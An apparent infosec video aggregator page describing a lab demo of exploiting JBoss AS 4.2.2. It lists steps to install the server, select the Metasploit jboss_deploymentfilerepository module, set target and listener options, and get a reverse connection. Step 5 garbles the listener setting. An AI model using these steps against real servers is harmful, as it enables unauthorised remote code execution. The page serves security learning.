Description: JBoss Application Server (or JBoss AS) is an open-source Java EE-based application server. An important distinction for this class of software is that it not only implements a server that runs on Java, but it actually implements the Java EE part of Java. Since it is Java-based, the JBoss application server operates cross-platform: usable on any operating system that supports Java. JBoss AS was developed by JBoss, now a division of Red Hat.
Credits : http://en.wikipedia.org/wiki/JBoss_application_server
This video is simple demo of exploiting jboss server. following are steps.
1. Download jboss_4_2_2_GA.zip
2. Unzip jboss
3. Go to jboss directory and run ./run.sh
Metasploit steps:
1.Search jboss
2.Use/exploit/multi/http/jboss_deploymentfilerepository
3.show options
4 Set RHOST Jboss ip
5. Set LPORT machine ip
6. Exploit
Tags: metasploit , exploit , jboss-server ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Both windows and Linux can be targated.
Its true for all os which support java.
This method will only work if the target server allows outbound connections to us.